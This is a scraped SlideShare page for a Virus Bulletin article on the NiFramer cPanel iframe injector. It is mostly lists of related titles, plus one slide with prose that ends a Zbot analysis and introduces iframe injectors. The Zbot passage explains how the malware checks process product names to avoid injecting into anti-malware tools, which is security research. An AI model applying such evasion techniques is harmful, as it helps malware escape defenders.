Developer's Guide to Windows Phone App Marketing and MonetizationDeveloper's Guide to Windows Phone App Marketing and Monetization
Developer's Guide to Windows Phone App Marketing and Monetization
 
Panel session: Advancing Merchant and Affiliate Relationships - a Guide for t...
Panel session: Advancing Merchant and Affiliate Relationships - a Guide for t...Panel session: Advancing Merchant and Affiliate Relationships - a Guide for t...
Panel session: Advancing Merchant and Affiliate Relationships - a Guide for t...
 
Network Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
Network Security : Book Review : Targeted Cyber Attacks : Aditya K SoodNetwork Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
Network Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
 
8 Ways a Digital Media Platform is More Powerful than “Marketing”
8 Ways a Digital Media Platform is More Powerful than “Marketing”8 Ways a Digital Media Platform is More Powerful than “Marketing”
8 Ways a Digital Media Platform is More Powerful than “Marketing”
 
How Often Should You Post to Facebook and Twitter
How Often Should You Post to Facebook and TwitterHow Often Should You Post to Facebook and Twitter
How Often Should You Post to Facebook and Twitter
 
Transgenicos(2)
Transgenicos(2)Transgenicos(2)
Transgenicos(2)
 
Slides That Rock
Slides That RockSlides That Rock
Slides That Rock
 
Why Content Marketing Fails
Why Content Marketing FailsWhy Content Marketing Fails
Why Content Marketing Fails
 
What Makes Great Infographics
What Makes Great InfographicsWhat Makes Great Infographics
What Makes Great Infographics
 
Masters of SlideShare
Masters of SlideShareMasters of SlideShare
Masters of SlideShare
 
STOP! VIEW THIS! 10-Step Checklist When Uploading to Slideshare
STOP! VIEW THIS! 10-Step Checklist When Uploading to SlideshareSTOP! VIEW THIS! 10-Step Checklist When Uploading to Slideshare
STOP! VIEW THIS! 10-Step Checklist When Uploading to Slideshare
 
You Suck At PowerPoint!
You Suck At PowerPoint!You Suck At PowerPoint!
You Suck At PowerPoint!
 
10 Ways to Win at SlideShare SEO & Presentation Optimization
10 Ways to Win at SlideShare SEO & Presentation Optimization10 Ways to Win at SlideShare SEO & Presentation Optimization
10 Ways to Win at SlideShare SEO & Presentation Optimization
 
How To Get More From SlideShare - Super-Simple Tips For Content Marketing
How To Get More From SlideShare - Super-Simple Tips For Content MarketingHow To Get More From SlideShare - Super-Simple Tips For Content Marketing
How To Get More From SlideShare - Super-Simple Tips For Content Marketing
 
A Guide to SlideShare Analytics - Excerpts from Hubspot's Step by Step Guide ...
A Guide to SlideShare Analytics - Excerpts from Hubspot's Step by Step Guide ...A Guide to SlideShare Analytics - Excerpts from Hubspot's Step by Step Guide ...
A Guide to SlideShare Analytics - Excerpts from Hubspot's Step by Step Guide ...
 
2015 Upload Campaigns Calendar - SlideShare
2015 Upload Campaigns Calendar - SlideShare2015 Upload Campaigns Calendar - SlideShare
2015 Upload Campaigns Calendar - SlideShare
 
What to Upload to SlideShare
What to Upload to SlideShareWhat to Upload to SlideShare
What to Upload to SlideShare
 
How to Make Awesome SlideShares: Tips & Tricks
How to Make Awesome SlideShares: Tips & TricksHow to Make Awesome SlideShares: Tips & Tricks
How to Make Awesome SlideShares: Tips & Tricks
 

Similar to NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine

Reverse engineering – debugging fundamentals
Reverse engineering – debugging fundamentalsReverse engineering – debugging fundamentals
Reverse engineering – debugging fundamentalsEran Goldstein
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with phpMohmad Feroz
 
15.3 student guide web application tool time overviewtodays c
15.3 student guide web application tool time overviewtodays c15.3 student guide web application tool time overviewtodays c
15.3 student guide web application tool time overviewtodays cUMAR48665
 
15.3 Student Guide Web Application Tool TimeOverviewTodays c
15.3 Student Guide Web Application Tool TimeOverviewTodays c15.3 Student Guide Web Application Tool TimeOverviewTodays c
15.3 Student Guide Web Application Tool TimeOverviewTodays cMatthewTennant613
 
15.3 Student Guide Web Application Tool TimeOverviewTodays c
15.3 Student Guide Web Application Tool TimeOverviewTodays c15.3 Student Guide Web Application Tool TimeOverviewTodays c
15.3 Student Guide Web Application Tool TimeOverviewTodays cAnastaciaShadelb
 
Web Application Penetration Tests - Vulnerability Identification and Details ...
Web Application Penetration Tests - Vulnerability Identification and Details ...Web Application Penetration Tests - Vulnerability Identification and Details ...
Web Application Penetration Tests - Vulnerability Identification and Details ...Netsparker
 
VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxkarthikvcyber
 
Server Side Template Injection by Mandeep Jadon
Server Side Template Injection by Mandeep JadonServer Side Template Injection by Mandeep Jadon
Server Side Template Injection by Mandeep JadonMandeep Jadon
 
Cross-site scripting (XSS) AttacksCross-site scripting (XSS) i.docx
Cross-site scripting (XSS) AttacksCross-site scripting (XSS) i.docxCross-site scripting (XSS) AttacksCross-site scripting (XSS) i.docx
Cross-site scripting (XSS) AttacksCross-site scripting (XSS) i.docxmydrynan
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks Ahmed Sherif
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxDARSHANBHAVSAR14
 
Automation of web attacks from advisories to create real world exploits
Automation of web attacks from advisories to create real world exploitsAutomation of web attacks from advisories to create real world exploits
Automation of web attacks from advisories to create real world exploitsMunir Njiru
 
Unifi securitybugs sep2013
Unifi securitybugs sep2013Unifi securitybugs sep2013
Unifi securitybugs sep2013testslidesha12
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008ClubHack
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008ClubHack
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CDamiable_indian
 
Analysis Of Adverarial Code - The Role of Malware Kits
Analysis Of Adverarial Code - The Role of Malware KitsAnalysis Of Adverarial Code - The Role of Malware Kits
Analysis Of Adverarial Code - The Role of Malware KitsRahul Mohandas
 
Cloudreach Voices - Stay Ahead of the Hackers; a Guide to Offensive Security
Cloudreach Voices - Stay Ahead of the Hackers; a Guide to Offensive SecurityCloudreach Voices - Stay Ahead of the Hackers; a Guide to Offensive Security
Cloudreach Voices - Stay Ahead of the Hackers; a Guide to Offensive SecurityCloudreach
 

Similar to NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine (20)

Reverse engineering – debugging fundamentals
Reverse engineering – debugging fundamentalsReverse engineering – debugging fundamentals
Reverse engineering – debugging fundamentals
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with php
 
15.3 student guide web application tool time overviewtodays c
15.3 student guide web application tool time overviewtodays c15.3 student guide web application tool time overviewtodays c
15.3 student guide web application tool time overviewtodays c
 
15.3 Student Guide Web Application Tool TimeOverviewTodays c
15.3 Student Guide Web Application Tool TimeOverviewTodays c15.3 Student Guide Web Application Tool TimeOverviewTodays c
15.3 Student Guide Web Application Tool TimeOverviewTodays c
 
15.3 Student Guide Web Application Tool TimeOverviewTodays c
15.3 Student Guide Web Application Tool TimeOverviewTodays c15.3 Student Guide Web Application Tool TimeOverviewTodays c
15.3 Student Guide Web Application Tool TimeOverviewTodays c
 
Web Application Penetration Tests - Vulnerability Identification and Details ...
Web Application Penetration Tests - Vulnerability Identification and Details ...Web Application Penetration Tests - Vulnerability Identification and Details ...
Web Application Penetration Tests - Vulnerability Identification and Details ...
 
Security testing
Security testingSecurity testing
Security testing
 
VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptx
 
Server Side Template Injection by Mandeep Jadon
Server Side Template Injection by Mandeep JadonServer Side Template Injection by Mandeep Jadon
Server Side Template Injection by Mandeep Jadon
 
Cross-site scripting (XSS) AttacksCross-site scripting (XSS) i.docx
Cross-site scripting (XSS) AttacksCross-site scripting (XSS) i.docxCross-site scripting (XSS) AttacksCross-site scripting (XSS) i.docx
Cross-site scripting (XSS) AttacksCross-site scripting (XSS) i.docx
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
 
Automation of web attacks from advisories to create real world exploits
Automation of web attacks from advisories to create real world exploitsAutomation of web attacks from advisories to create real world exploits
Automation of web attacks from advisories to create real world exploits
 
Unifi securitybugs sep2013
Unifi securitybugs sep2013Unifi securitybugs sep2013
Unifi securitybugs sep2013
 
Kioptrix 2014 5
Kioptrix 2014 5Kioptrix 2014 5
Kioptrix 2014 5
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CD
 
Analysis Of Adverarial Code - The Role of Malware Kits
Analysis Of Adverarial Code - The Role of Malware KitsAnalysis Of Adverarial Code - The Role of Malware Kits
Analysis Of Adverarial Code - The Role of Malware Kits
 
Cloudreach Voices - Stay Ahead of the Hackers; a Guide to Offensive Security
Cloudreach Voices - Stay Ahead of the Hackers; a Guide to Offensive SecurityCloudreach Voices - Stay Ahead of the Hackers; a Guide to Offensive Security
Cloudreach Voices - Stay Ahead of the Hackers; a Guide to Offensive Security
 

More from Aditya K Sood

Emerging Trends in Online Social Networks Malware
Emerging Trends in Online Social Networks MalwareEmerging Trends in Online Social Networks Malware
Emerging Trends in Online Social Networks MalwareAditya K Sood
 
Enfilade: Tool to Detect Infections in MongoDB Instances
Enfilade: Tool to Detect Infections in MongoDB InstancesEnfilade: Tool to Detect Infections in MongoDB Instances
Enfilade: Tool to Detect Infections in MongoDB InstancesAditya K Sood
 
Detecting Ransomware/Bot Infections in Elasticsearch
Detecting Ransomware/Bot Infections in ElasticsearchDetecting Ransomware/Bot Infections in Elasticsearch
Detecting Ransomware/Bot Infections in ElasticsearchAditya K Sood
 
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...Aditya K Sood
 
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...Aditya K Sood
 
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...Aditya K Sood
 
DEF CON 20 - Botnets Die Hard - Owned and Operated
DEF CON 20 - Botnets Die Hard - Owned and OperatedDEF CON 20 - Botnets Die Hard - Owned and Operated
DEF CON 20 - Botnets Die Hard - Owned and OperatedAditya K Sood
 
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks Aditya K Sood
 
NGR Bot Analysis Paper
NGR Bot Analysis PaperNGR Bot Analysis Paper
NGR Bot Analysis PaperAditya K Sood
 
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...Aditya K Sood
 
Commercial Cyber Crime - Social Networks Malware
Commercial Cyber Crime - Social Networks MalwareCommercial Cyber Crime - Social Networks Malware
Commercial Cyber Crime - Social Networks MalwareAditya K Sood
 
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...Aditya K Sood
 
OWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web MalwareOWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web MalwareAditya K Sood
 
Browser Malware Taxonomy
Browser Malware TaxonomyBrowser Malware Taxonomy
Browser Malware TaxonomyAditya K Sood
 
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...Aditya K Sood
 
PenTest Magazine Teaser - Mobile Hacking
PenTest Magazine Teaser - Mobile HackingPenTest Magazine Teaser - Mobile Hacking
PenTest Magazine Teaser - Mobile HackingAditya K Sood
 
Dissecting Java Server Faces for Penetration Testing
Dissecting Java Server Faces for Penetration Testing Dissecting Java Server Faces for Penetration Testing
Dissecting Java Server Faces for Penetration Testing Aditya K Sood
 
VxWorks - Holistic Security (Art of Testing)
VxWorks - Holistic Security (Art of Testing)VxWorks - Holistic Security (Art of Testing)
VxWorks - Holistic Security (Art of Testing)Aditya K Sood
 
Toorcon Seattle 2011 - Browser Exploit Packs
Toorcon Seattle 2011 - Browser Exploit PacksToorcon Seattle 2011 - Browser Exploit Packs
Toorcon Seattle 2011 - Browser Exploit PacksAditya K Sood
 
Art of InfoJacking, Source Conference Seattle, 2011
Art of InfoJacking, Source Conference Seattle, 2011Art of InfoJacking, Source Conference Seattle, 2011
Art of InfoJacking, Source Conference Seattle, 2011Aditya K Sood
 

More from Aditya K Sood (20)

Emerging Trends in Online Social Networks Malware
Emerging Trends in Online Social Networks MalwareEmerging Trends in Online Social Networks Malware
Emerging Trends in Online Social Networks Malware
 
Enfilade: Tool to Detect Infections in MongoDB Instances
Enfilade: Tool to Detect Infections in MongoDB InstancesEnfilade: Tool to Detect Infections in MongoDB Instances
Enfilade: Tool to Detect Infections in MongoDB Instances
 
Detecting Ransomware/Bot Infections in Elasticsearch
Detecting Ransomware/Bot Infections in ElasticsearchDetecting Ransomware/Bot Infections in Elasticsearch
Detecting Ransomware/Bot Infections in Elasticsearch
 
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
 
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
 
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
 
DEF CON 20 - Botnets Die Hard - Owned and Operated
DEF CON 20 - Botnets Die Hard - Owned and OperatedDEF CON 20 - Botnets Die Hard - Owned and Operated
DEF CON 20 - Botnets Die Hard - Owned and Operated
 
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
 
NGR Bot Analysis Paper
NGR Bot Analysis PaperNGR Bot Analysis Paper
NGR Bot Analysis Paper
 
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
 
Commercial Cyber Crime - Social Networks Malware
Commercial Cyber Crime - Social Networks MalwareCommercial Cyber Crime - Social Networks Malware
Commercial Cyber Crime - Social Networks Malware
 
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
 
OWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web MalwareOWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web Malware
 
Browser Malware Taxonomy
Browser Malware TaxonomyBrowser Malware Taxonomy
Browser Malware Taxonomy
 
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
 
PenTest Magazine Teaser - Mobile Hacking
PenTest Magazine Teaser - Mobile HackingPenTest Magazine Teaser - Mobile Hacking
PenTest Magazine Teaser - Mobile Hacking
 
Dissecting Java Server Faces for Penetration Testing
Dissecting Java Server Faces for Penetration Testing Dissecting Java Server Faces for Penetration Testing
Dissecting Java Server Faces for Penetration Testing
 
VxWorks - Holistic Security (Art of Testing)
VxWorks - Holistic Security (Art of Testing)VxWorks - Holistic Security (Art of Testing)
VxWorks - Holistic Security (Art of Testing)
 
Toorcon Seattle 2011 - Browser Exploit Packs
Toorcon Seattle 2011 - Browser Exploit PacksToorcon Seattle 2011 - Browser Exploit Packs
Toorcon Seattle 2011 - Browser Exploit Packs
 
Art of InfoJacking, Source Conference Seattle, 2011
Art of InfoJacking, Source Conference Seattle, 2011Art of InfoJacking, Source Conference Seattle, 2011
Art of InfoJacking, Source Conference Seattle, 2011
 

Recently uploaded

What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfMounikaPolabathina
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rick Flair
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 

Recently uploaded (20)

What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 

NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine

  • 1. VIRUS BULLETIN www.virusbtn.com MALWARE ANALYSIS 3 information about each device using the QueryDosDeviceW API. Zbot uses the resulting device type and compares it against the ProcessImageFileName to determine the exact path of the executable file of the currently parsed process. Once Zbot knows the exact path of the equivalent executable file of the parsed process, it starts gathering information by calling the GetFileVersionInfoSizeW API to determine if the file contains version information. If there is no version information available for the executable file, Zbot will skip this part of the routine. This is followed by actually getting the file version information using a call to the GetFileVersionInfoW API. Then, the malware uses the VerQueryValueW API with ‘VarFileInfoTranslation’ as the parameter, to get the pointer to the translation array from the version-information resource. It uses the resulting array of language and code page identifiers to determine the ‘{lang-codepage}’ value for the next call to the VerQueryValueW API. Finally, Zbot gets the ‘Product Name’ of the executable file using another call to the VerQueryValueW API with an lpSubBlock parameter of ‘StringFileInfo{lang-codepage} ProductName’. After getting the ‘Product Name’ of the executable file, Zbot checks it against specific strings found in some anti-malware applications (see Figure 3). If the executable file’s ‘Product Name’ contains substrings of an anti-malware name, Zbot will not perform the code injection for the executable’s process. INSIDE AN IFRAME INJECTOR: A LOOK INTO NIFRAMER Aditya K. Sood Michigan State University, USA Rohit Bansal & Peter Greko Independent security researchers, USA In this article, we discuss the design of an iframe injector used to infect web-hosting software such as cPanel in an automated manner. Several different iframe injector designs exist, but we look at one of the most basic: NiFramer. INTRODUCTION Iframe injectors are used by attackers to automate the process of injecting malicious iframe tags into web pages. These tools are designed to perform distributed infections on a target server in a short period of time. Iframe injectors are accompanied by automated malware infection frameworks either as a built-in component or separately. In this paper, we present a variant of NiFramer, an automated iframe injection tool that is used to infect cPanel installations on compromised servers. Iframe injectors work with both dedicated and virtual hosting servers, but their primary benefit is in infecting virtual hosting servers that host large numbers of servers running websites and applications. Running an iframe injector on a compromised virtual hosting server can easily result in the infection of hundreds of web servers in just a few seconds. WRAP UP We all know that Zbot is a well-coded piece of malware. It uses a non-standard 